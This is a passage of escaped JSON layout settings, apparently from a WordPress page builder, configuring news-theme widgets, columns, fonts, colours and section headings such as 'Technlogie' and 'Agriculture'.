t_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"u